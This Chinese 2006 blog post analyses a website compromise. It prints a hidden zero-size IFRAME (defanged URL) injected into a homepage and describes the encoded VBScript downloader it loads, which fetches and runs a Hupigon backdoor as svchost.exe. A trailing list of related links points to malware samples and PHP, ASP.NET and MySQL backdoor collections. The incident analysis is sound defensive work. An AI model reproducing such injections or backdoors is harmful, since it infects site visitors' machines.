endurer 原创
2006-11-22 第1版
该网站首页首部被加入代码:
/-----------
<IFRAME src="hxxp://58***000.128**.to***for.com/x***skj.htm width=0 height=0></IFRAME>
-----------/
x***skj.htm 的内容为escape()加密的VBScript代码,功能为:利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 setup.exe,保存为 %temp%/svchost.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。
setup.exe 文件大小为301 KB (308,224 字节),Kaspersky 报为 Backdoor.Win32.Hupigon.cge。
分享到:
相关推荐
【病毒名称】:Backdoor.Win32.Hupigon.dsx 【病毒类型】:后门 【危害程度】:中 【传播方式】:网络 【受影响系统】:windows 98以上 病毒行为: 病毒运行后,首先修改该系统时间,致使一些杀软安软因系统时间不符...
Backdoor.Win32.Delf.aws 病毒样本。
重新启动,打开工具直接绿色运行,本工具是经过在xp系统上测试过的,没有问题,win7还没有测试
生产使用的Linux.BackDoor.Gates.5木马处理文档!
delphi Backdoor.Metarage
大马文件
我们因掌握删除计算机病毒的方法,以减少我们的损失,通过对威金病毒、恶邮差病毒、MSN圣诞照片变种B(Backdoor.Win32.PBot.b)的手工删除来学习掌握手工删除计算机病毒的方法。并了解病毒的本质、构成以及运行原理...
ASP.NET源码——ASP.NET Web BackDoor.zip
ident_backdoor
account_backdoor
mod_rootme_backdoor
backdoor-pyc, 带代码的修补程序文件 相当 lame 后门沉淀物用恶意代码文件替换pmbus文件。更改日志#### 11/10/2015不再向tmp写入,直接编辑pyc文件Bug 修复以前的工作https://www.virusbtn.com/virusbulletin
文件夹图标病毒专杀工具FolderCure更新到:V4.7Bulid20091001-1 Foldcure增加AI_Boy所破坏的文件夹与注册表的修复模块 更改FolderCure主界面一处文字说明 ...svrhost.exe Backdoor.Win32.Gpigeon.dks等等
无惧上传类UpFileClassV2.2.rar asp无惧上传类UpFileClassV2.2.rar
仅用于教育和/或测试目的。 笔记 不一定包含您可以在反找到的后门的反混淆的版本。 要对这些技巧和其他技巧进行模糊处理,请查看“ 部分。 始终在安全的环境中调查恶意软件。 这意味着:与您的网络分开并...这是一个
#History这是PHP脚本后门的列表,允许攻击者破坏网站并获得对数据库和敏感目录的完整访问权,基本上是PHP Backdoor Web应用程序Trojan,它可以完全入侵任何网站并获得完整的数据库。 #仅用于教育目的。
阅读工具,也同样被感染了一个名为Backdoor.XiaoNiao的木马,这个木马对现在的杀软来说,轻松搞定,也没什么影响。 如果对病毒和木马有所顾及,请勿使用该工具。再补充一点,此工具来源于学术不端行为检测工具的原...
mysql backdoor. see it yourself
lpkKiller是巨盾出品的...RavRbot是一款针对Backdoor.Win32.Rbot后门病毒的专用清除工具,而该病毒可以在有可执行文件的目录下生成LPK.DLL文件,当运行改文件的时间便会激活,导致不能彻底清除,而本工具便能很好的解决